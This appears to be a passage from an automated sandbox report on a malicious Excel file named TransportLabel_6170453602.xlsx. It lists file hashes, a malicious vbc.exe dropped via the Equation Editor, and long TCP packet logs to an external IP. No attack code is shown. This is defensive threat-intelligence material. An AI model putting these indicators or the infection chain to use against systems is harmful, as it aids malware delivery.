SHA-512:	DF40D4A774E0B453A5B87C00D6F0EF5D753143454E88EE5F7B607134598294C7905CCBCF94BBC46E474DB6EB44E56A6DBB6D9A1BE9D4FB5D1B5F2D0C6ED34BFE
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\~DFC28532160E8B0828.TMP

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	CDFV2 Encrypted
Category:	dropped
Size (bytes):	188416
Entropy (8bit):	7.956582645953576
Encrypted:	false
SSDEEP:	3072:TkPr1dg3M2he5DZQVVbexBYKeO7OwRa7lpe54UYE2QQh22tolXoubT7:pMH5GVVbUY77XQ4PE21VWn7
MD5:	1DB66B406376F18434E1C02CBCF5C5E5
SHA1:	35741CA39D0D76A00FAC1EAA720101D7BFD82CC5
SHA-256:	A561EFADB6BAB1E3D4F5B0CDEFAECC0C4AFB382BFE3BDE81E1DAD0AEFC76695C
SHA-512:	B2D4C212F7CFB8A6088E221D28C80ADCAEA2C07E5B400A8FACE28D2F918CA808E754F83CC36346011DA31F3EA1C60EF2284988E5F8AE769B99FDB6AEA4427106
Malicious:	false
Preview:	......................>................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...

C:\Users\user\Desktop\~$TransportLabel_6170453602.xlsx

Download File

Process:	C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
File Type:	data
Category:	dropped
Size (bytes):	165
Entropy (8bit):	1.4377382811115937
Encrypted:	false
SSDEEP:	3:vZ/FFDJw2fV:vBFFGS
MD5:	797869BB881CFBCDAC2064F92B26E46F
SHA1:	61C1B8FBF505956A77E9A79CE74EF5E281B01F4B
SHA-256:	D4E4008DD7DFB936F22D9EF3CC569C6F88804715EAB8101045BA1CD0B081F185
SHA-512:	1B8350E1500F969107754045EB84EA9F72B53498B1DC05911D6C7E771316C632EA750FBCE8AD3A82D664E3C65CC5251D0E4A21F750911AE5DC2FC3653E49F58D
Malicious:	true
Preview:	.user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

C:\Users\Public\vbc.exe

Download File

Process:	C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	326847
Entropy (8bit):	7.537994904334399
Encrypted:	false
SSDEEP:	6144:13yztyL/0/bbdat6J9mOnuuAgo+/sOxCHBs4YIwUrJrnBpKussJ9LQu:13pL0/bbdat6JIO1Ag2TBs4YI3BnB35N
MD5:	D5E55A57372BCAD45FBB260105179CAF
SHA1:	9B1935A927C072DD31017362FF1739BF1EA2AAF7
SHA-256:	3C27C2AA1BC826FAA65AB4038EB385CABD6DB50108410E6F674D455AA1DC5532
SHA-512:	088033564668A4FD3E107566387FECF0B6DCBD7A161C9EF3E4ADB232520467A64AF9EEC740FE783D5C62FA3B79BDD910E72F3ACC838E5FA155427C83003C407B
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L...h.Oa.................h....:......5............@...........................>...........@..........................................`=..Y...........................................................................................................text...pf.......h.................. ..`.rdata...............l..............@..@.data...x.9.........................@....ndata........:..........................rsrc....Y...`=..Z..................@..@................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	CDFV2 Encrypted
Entropy (8bit):	7.956582645953576
TrID:	Generic OLE2 / Multistream Compound File (8008/1) 100.00%
File name:	TransportLabel_6170453602.xlsx
File size:	188416
MD5:	1db66b406376f18434e1c02cbcf5c5e5
SHA1:	35741ca39d0d76a00fac1eaa720101d7bfd82cc5
SHA256:	a561efadb6bab1e3d4f5b0cdefaecc0c4afb382bfe3bde81e1dad0aefc76695c
SHA512:	b2d4c212f7cfb8a6088e221d28c80adcaea2c07e5b400a8face28d2f918ca808e754f83cc36346011da31f3ea1c60ef2284988e5f8ae769b99fdb6aea4427106
SSDEEP:	3072:TkPr1dg3M2he5DZQVVbexBYKeO7OwRa7lpe54UYE2QQh22tolXoubT7:pMH5GVVbUY77XQ4PE21VWn7
TLSH:	E5040206BF29E682F0B551305E329F279A24FC13486CD9D81FB9FF942CB1495AA2D353
File Content Preview:	........................>......................................................................................................................................................................................................................................

File Icon


Icon Hash:	e4e2aa8aa4b4bcb4

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 12, 2022 09:27:57.101392031 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.324285984 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.324409962 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.325670004 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.549187899 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.549215078 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.549237013 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.549256086 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.549328089 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.549475908 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.772262096 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.772303104 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.772331953 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.772360086 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.772386074 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.772409916 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.772420883 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.772437096 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.772449017 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.772452116 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.772454977 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.772464991 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.772465944 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.772495031 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.995583057 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995616913 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995639086 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995687008 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995709896 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995733023 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995758057 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995770931 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.995783091 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995800972 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.995805025 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.995807886 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995815992 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.995834112 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995857000 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995872021 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.995882034 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995886087 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.995904922 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995912075 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.995928049 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995938063 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.995951891 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995956898 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.995976925 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:57.995989084 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:57.997986078 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.000597000 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.218966007 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.218995094 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219017982 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219041109 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219063044 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219084978 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219108105 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219130039 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219151020 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219173908 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219182014 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219194889 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219209909 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219214916 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219218016 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219222069 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219221115 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219225883 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219244957 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219266891 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219289064 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219289064 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219297886 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219310999 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219331980 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219352007 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219353914 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219367027 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219377995 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219399929 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219419956 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219419956 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219428062 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219443083 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219465971 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219485044 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219497919 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219520092 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219538927 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219546080 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219559908 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219559908 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219578981 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219582081 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219588995 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219603062 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219623089 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.219643116 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.219655991 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.220813990 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.220841885 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.220873117 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.220900059 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.223871946 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.442488909 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442523956 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442547083 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442570925 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442593098 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442616940 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442640066 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442662954 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442687035 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442708969 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442732096 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442754984 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442778111 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442800999 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442822933 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442821980 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.442841053 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442857981 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.442858934 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442863941 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.442867994 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.442871094 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.442873001 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.442877054 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.442879915 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442898989 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442915916 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442936897 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442959070 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442981005 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.442994118 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.443001032 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.443003893 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.443005085 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.443073034 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.443103075 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.446660042 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.446691036 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.446712971 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.446738005 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.446762085 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.446784019 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.446805954 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.446827888 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.446824074 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.446851969 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.446862936 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.446866989 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.446868896 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.446872950 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.446877003 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.446897030 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.446902037 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.446921110 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.446926117 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.446938992 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.446948051 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.446966887 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.446971893 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.446986914 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.446995020 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.447011948 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.447017908 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.447038889 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.447041035 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.447057009 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.447063923 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.447078943 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.447087049 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.447107077 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.447108984 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.447127104 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.447132111 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.447154045 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.447159052 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.447175980 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.447180986 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.447199106 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.447199106 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.447216034 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.447218895 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.447236061 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.459935904 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.462074995 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.665867090 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.665934086 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.665975094 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.666008949 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.666013002 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.666034937 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.666047096 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.666054010 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.666090012 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.666093111 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.666127920 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.666135073 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.666173935 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.666176081 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.666214943 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.672641039 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.672699928 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.672704935 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.672738075 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.672740936 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.672780037 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.672781944 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.672823906 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.672864914 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.672878981 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.672883034 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.672903061 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.672904968 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.672940016 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.672944069 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.672983885 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.672988892 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673022032 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673022985 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673062086 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673062086 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673099995 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673100948 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673140049 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673141003 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673176050 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673182011 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673219919 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673221111 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673258066 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673263073 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673300028 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673302889 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673340082 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673341990 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673378944 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673383951 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673410892 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673424006 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673425913 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673461914 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673464060 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673501968 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673506021 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673543930 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673544884 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673579931 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673583031 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673623085 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673624992 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673661947 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673682928 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673696995 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673701048 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673738956 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673741102 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673779964 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673796892 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673810959 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673823118 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673861027 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673877001 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673899889 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673901081 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673940897 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.673948050 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.673979998 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.674000025 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.674021006 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.674021006 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.674079895 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.682565928 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.682626009 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.682647943 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.682656050 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.682703018 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.682708025 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.684993982 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.685060978 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.685060978 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.685112000 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.692693949 CEST	49173	80	192.168.2.22	103.149.13.182
May 12, 2022 09:27:58.888905048 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.888942003 CEST	80	49173	103.149.13.182	192.168.2.22
May 12, 2022 09:27:58.888958931 CEST	80	49173	103.149.13.182	192.168.2.22
